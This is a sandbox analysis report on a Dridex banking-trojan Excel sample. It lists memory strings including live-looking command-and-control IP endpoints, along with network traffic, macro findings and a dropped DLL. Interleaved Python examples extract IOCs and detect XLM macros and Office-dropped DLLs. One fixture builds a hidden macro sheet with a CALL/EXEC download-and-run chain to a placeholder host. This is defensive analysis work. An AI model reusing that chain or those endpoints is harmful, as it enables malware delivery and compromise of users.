Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236863472.0000000000171000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2388405613.00000000023D0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241751629.00000000040C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2387778399.0000000001D40000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2388107432.0000000001F00000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2237799499.0000000002320000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2388405613.00000000023D0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241751629.00000000040C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2236762354.00000000029AD000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000007.00000002.2241208427.0000000003637000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmp | String found in binary or memory: https://46.105.131.65/k
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmp | String found in binary or memory: https://46.105.131.65/u
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp | String found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmp | String found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmp | String found in binary or memory: https://5.100.228.233/N
Source: regsvr32.exe, 00000004.00000002.2387949260.00000000008AF000.00000004.00000020.sdmp | String found in binary or memory: https://5.100.228.233:3389/
Source: regsvr32.exe, 00000004.00000002.2387949260.00000000008AF000.00000004.00000020.sdmp | String found in binary or memory: https://5.100.228.233:3389/4V
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp | String found in binary or memory: https://77.220.64.37/Bf
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp | String found in binary or memory: https://77.220.64.37/Kf
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmp | String found in binary or memory: https://80.86.91.27/K
Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmp | String found in binary or memory: https://80.86.91.27/x
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp | String found in binary or memory: https://80.86.91.27:3308/
Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
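The strings above mix two populations: bare-IP HTTPS URLs found only in regsvr32.exe memory (several on ports other than 443), and CA policy and Windows component strings that any process using CryptoAPI or Outlook Express libraries carries. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses lines in the table's format into a per-endpoint IOC list, keeps only IP-literal hosts, and flags TLS on non-standard ports. The sample lines are copied from this section; the ` | ` separator between the source and the string is an assumed presentation detail, and the parser also accepts the form without it.

```python
"""Turn Joe Sandbox 'String found in binary or memory' lines into an IOC table."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed sample: lines copied from this report's string table.
REPORT_LINES = [
    "Source: regsvr32.exe, 00000004.00000002.2388405613.00000000023D0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241751629.00000000040C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA",
    "Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02",
    "Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmp | String found in binary or memory: https://46.105.131.65/k",
    "Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmp | String found in binary or memory: https://46.105.131.65/u",
    "Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp | String found in binary or memory: https://46.105.131.65:1512/",
    "Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmp | String found in binary or memory: https://5.100.228.233/",
    "Source: regsvr32.exe, 00000004.00000002.2387949260.00000000008AF000.00000004.00000020.sdmp | String found in binary or memory: https://5.100.228.233:3389/4V",
    "Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp | String found in binary or memory: https://77.220.64.37/Bf",
    "Source: regsvr32.exe, 00000004.00000002.2388056485.0000000000947000.00000004.00000020.sdmp | String found in binary or memory: https://80.86.91.27/K",
    "Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp | String found in binary or memory: https://80.86.91.27:3308/",
    "Source: regsvr32.exe, 00000004.00000002.2387974585.00000000008E3000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238170187.0000000002960000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0",
]

# Works with or without a ' | ' separator before the signature text.
LINE_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)")
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


@dataclass
class Endpoint:
    host: str
    port: int
    scheme: str
    paths: set = field(default_factory=set)
    processes: set = field(default_factory=set)


def parse_line(line):
    """Return (scheme, host, port, path, processes) or None for non-IP hosts."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, url = m.group("src"), m.group("url")
    # The source column alternates process names and memory-dump ids.
    procs = {t.strip() for t in src.split(",") if t.strip() and not t.strip().endswith(".sdmp")}
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not IPV4_RE.fullmatch(host):
        return None  # CA, MSN and format-string URLs: library noise, not C2
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return parts.scheme, host, port, parts.path or "/", procs


def extract_endpoints(lines):
    """Deduplicate by (host, port); collect every path and process seen."""
    table = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        scheme, host, port, path, procs = rec
        ep = table.setdefault((host, port), Endpoint(host, port, scheme))
        ep.paths.add(path)
        ep.processes |= procs
    return [table[k] for k in sorted(table)]


def nonstandard_tls(endpoints):
    """HTTPS on a port other than 443: worth its own network-detection rule."""
    return [ep for ep in endpoints if ep.scheme == "https" and ep.port != 443]


if __name__ == "__main__":
    eps = extract_endpoints(REPORT_LINES)
    for ep in eps:
        print(f"{ep.host}:{ep.port} {sorted(ep.paths)} {sorted(ep.processes)}")
    print("non-standard TLS ports:", sorted(ep.port for ep in nonstandard_tls(eps)))
```

The short paths (`/k`, `/u`, `/Bf`, `/4V`) are whatever bytes followed the URL in the dump, so match on host and port when turning this into a block list, not on the path.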
Source: unknown | Network traffic detected: HTTP traffic on port 443, in both directions (443 -> local port and local port -> 443), for each of the following 59 local ports: 49165, 49168, 49172, 49176, 49180, 49184, 49188, 49192, 49196, 49200, 49204, 49208, 49212, 49216, 49220, 49224, 49230, 49234, 49238, 49242, 49246, 49250, 49254, 49258, 49262, 49266, 49270, 49274, 49278, 49282, 49286, 49290, 49294, 49298, 49302, 49306, 49310, 49314, 49318, 49322, 49326, 49330, 49334, 49338, 49342, 49346, 49350, 49354, 49358, 49362, 49366, 49370, 49374, 49378, 49382, 49386, 49390, 49394, 49398
Source: unknown | HTTPS traffic detected: 185.2.4.104:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:<local port> version: TLS 1.2, for each of the following 58 local ports: 49168, 49172, 49176, 49180, 49184, 49188, 49192, 49196, 49200, 49204, 49208, 49212, 49216, 49220, 49224, 49230, 49234, 49238, 49242, 49246, 49250, 49254, 49258, 49262, 49266, 49270, 49274, 49278, 49282, 49286, 49290, 49294, 49298, 49302, 49306, 49310, 49314, 49318, 49322, 49326, 49330, 49334, 49338, 49342, 49346, 49350, 49354, 49358, 49362, 49366, 49370, 49374, 49378, 49382, 49386, 49390, 49394, 49398
Source: unknown | HTTPS traffic detected: 192.168.2.22:49310 -> 77.220.64.37:443 version: TLS 1.2

E-Banking Fraud:

Detected Dridex e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002B5150 OutputDebugStringA, Sleep, OutputDebugStringA, OutputDebugStringA, Sleep, OutputDebugStringA, OutputDebugStringA, Sleep, OutputDebugStringA, OutputDebugStringA, Sleep, OutputDebugStringA, GetAdaptersInfo, LoadLibraryW
Source: C:\Windows\System32\DWWIN.EXE | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab") | Name: pagesREviewsd
Found Excel 4.0 Macro with suspicious formulas
Source: INV3867196801-20210111675616.xlsm | Initial sample: CALL (4 matches)
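The CALL hits above are Excel 4.0 (XLM) macro formulas rather than VBA. In an .xlsm they are stored as formula cells in xl/macrosheets/*.xml, the workbook's relationship file marks those parts with the xlMacrosheet relationship type, and the sheet entry in xl/workbook.xml is usually given state="veryHidden" so it never appears in the tab bar. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tool: it builds a constructed workbook in memory with a hidden macro sheet carrying a CALL/EXEC download-and-run chain (the URL and DLL path in it are placeholders, not values from this sample) and then scans it with only the standard library. Element names are matched without their namespace so the scanner tolerates producer differences.

```python
"""Find XLM macro sheets, hidden sheets and code-executing formulas in an .xlsm."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
XM_NS = "http://schemas.microsoft.com/office/excel/2006/main"
WORKSHEET_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet"
MACROSHEET_REL = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"

# XLM functions that run code or rewrite the sheet at execution time.
SUSPICIOUS = re.compile(r"(?<![A-Z.])(CALL|EXEC|REGISTER|FORMULA(?:\.FILL)?|RUN)\s*\(", re.I)

WORKBOOK_XML = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="{MAIN_NS}" xmlns:r="{REL_NS}">
  <sheets>
    <sheet name="Invoice" sheetId="1" r:id="rId1"/>
    <sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>
  </sheets>
</workbook>'''

RELS_XML = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="{WORKSHEET_REL}" Target="worksheets/sheet1.xml"/>
  <Relationship Id="rId2" Type="{MACROSHEET_REL}" Target="macrosheets/sheet1.xml"/>
</Relationships>'''

# Constructed macro sheet (placeholder URL and path, not taken from the sample).
MACROSHEET_XML = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="{MAIN_NS}" xmlns:xm="{XM_NS}">
  <sheetData>
    <row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://example.invalid/p","C:\\Users\\Public\\x.dll",0,0)</f></c></row>
    <row r="2"><c r="A2"><f>EXEC("regsvr32 -s C:\\Users\\Public\\x.dll")</f></c></row>
    <row r="3"><c r="A3"><f>HALT()</f></c></row>
  </sheetData>
</xm:macrosheet>'''


def build_sample_xlsm() -> bytes:
    """Minimal OOXML package with one visible worksheet and one hidden macro sheet."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", WORKBOOK_XML)
        z.writestr("xl/_rels/workbook.xml.rels", RELS_XML)
        z.writestr("xl/macrosheets/sheet1.xml", MACROSHEET_XML)
        z.writestr("xl/worksheets/sheet1.xml", f'<worksheet xmlns="{MAIN_NS}"><sheetData/></worksheet>')
    return buf.getvalue()


def _local(tag):
    return tag.rsplit("}", 1)[-1]


def scan_xlm(data: bytes):
    """Return hidden sheets and every suspicious formula on a macro sheet."""
    findings = {"hidden_sheets": [], "formulas": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        rels = {}
        if "xl/_rels/workbook.xml.rels" in names:
            for rel in ET.fromstring(z.read("xl/_rels/workbook.xml.rels")):
                rels[rel.get("Id")] = (rel.get("Type"), rel.get("Target", ""))
        macrosheets = []
        if "xl/workbook.xml" in names:
            for el in ET.fromstring(z.read("xl/workbook.xml")).iter():
                if _local(el.tag) != "sheet":
                    continue
                rtype, target = rels.get(el.get(f"{{{REL_NS}}}id"), (None, ""))
                state = el.get("state", "visible")
                if state != "visible":
                    findings["hidden_sheets"].append((el.get("name"), state))
                if rtype == MACROSHEET_REL:
                    part = target.lstrip("/") if target.startswith("/") else "xl/" + target
                    macrosheets.append((el.get("name"), part))
        for sheet_name, part in macrosheets:
            if part not in names:
                continue
            for c in ET.fromstring(z.read(part)).iter():
                if _local(c.tag) != "c":
                    continue
                for f in c:
                    if _local(f.tag) == "f" and f.text and SUSPICIOUS.search(f.text):
                        findings["formulas"].append((sheet_name, c.get("r"), f.text))
    return findings


if __name__ == "__main__":
    for k, v in scan_xlm(build_sample_xlsm()).items():
        print(k, v)
```

A real sample may split the call across cells and assemble it with FORMULA or CHAR() arithmetic, so treat a hidden macro sheet as suspicious on its own, even when no formula matches the regex.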
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\jczxic.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zip
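The chain this report documents is EXCEL.EXE writing jczxic.dll under the user's Temp directory and the Dridex strings then turning up inside a SysWOW64 regsvr32.exe. The Python below is an added example, not part of the Joe Sandbox report: it runs three host detections over constructed Sysmon-style events (ID 11 FileCreate, ID 1 ProcessCreate) and correlates them. The regsvr32 command line and the parent process in the constructed events are assumptions; the report shows only the dropped path and the regsvr32 process, not how it was launched.

```python
"""Office-drops-DLL, LOLBin-loads-DLL-from-user-path, and their correlation."""
import re
from datetime import datetime

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
DLL_LOADERS = {"regsvr32.exe", "rundll32.exe"}
PE_EXT = (".dll", ".exe", ".ocx", ".scr")
# Locations a standard user can write to; a DLL registered from here is a red flag.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\|\\users\\public\\|\\programdata\\|\\windows\\temp\\", re.I)
DLL_IN_CMDLINE = re.compile(r'"([^"]+\.dll)"|(\S+\.dll)', re.I)

# Constructed events. Event 2's command line and parent are assumptions.
EVENTS = [
    {"t": "2021-01-11T12:00:01", "id": 11,
     "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "target": r"C:\Users\user\AppData\Local\Temp\jczxic.dll"},
    {"t": "2021-01-11T12:00:03", "id": 1,
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r'regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\jczxic.dll"',
     "parent": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"t": "2021-01-11T12:05:00", "id": 1,                     # benign installer activity
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll",
     "parent": r"C:\Windows\System32\msiexec.exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events, window_s=300):
    """Return (rule, evidence) alerts in event order."""
    alerts = []
    office_drops = {}  # lowercase dropped path -> time of the FileCreate
    for ev in sorted(events, key=lambda e: e["t"]):
        t = datetime.fromisoformat(ev["t"])
        img = basename(ev["image"])
        if ev["id"] == 11 and img in OFFICE_IMAGES and ev["target"].lower().endswith(PE_EXT):
            office_drops[ev["target"].lower()] = t
            alerts.append(("office_drops_pe", ev["target"]))
        elif ev["id"] == 1 and img in DLL_LOADERS:
            m = DLL_IN_CMDLINE.search(ev.get("cmdline", ""))
            dll = (m.group(1) or m.group(2)) if m else None
            if dll and USER_WRITABLE.search(dll):
                alerts.append(("lolbin_loads_user_writable_dll", dll))
                dropped_at = office_drops.get(dll.lower())
                # Same path written by Office moments earlier: high-confidence chain.
                if dropped_at is not None and (t - dropped_at).total_seconds() <= window_s:
                    alerts.append(("office_dropped_dll_executed", dll))
            if basename(ev.get("parent", "")) in OFFICE_IMAGES:
                alerts.append(("office_spawns_dll_loader", ev["image"]))
    return alerts


if __name__ == "__main__":
    for rule, evidence in detect(EVENTS):
        print(f"{rule}: {evidence}")
```

The correlation rule does not need the parent process: Dridex loaders often launch regsvr32 through an intermediate (here the XLM CALL/EXEC path), so keying on the dropped file path rather than the process tree survives that indirection.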
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002C22A0 NtDelayExecution
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002DBE30 NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001BB770 VirtualAlloc, VirtualAlloc, NtSetInformationProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_001BBA14 NtSetInformationProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002B5150
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002D1020
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002CD030
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002CE0A0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002DDCA0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002D50A0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002D4CA0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002D5CB0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002C88C0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002C8CC0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002C98DA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002BACD0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002CA0D0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002C7564
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002B1570
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002BF9A0
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002CD980
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002DD180
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_002CC590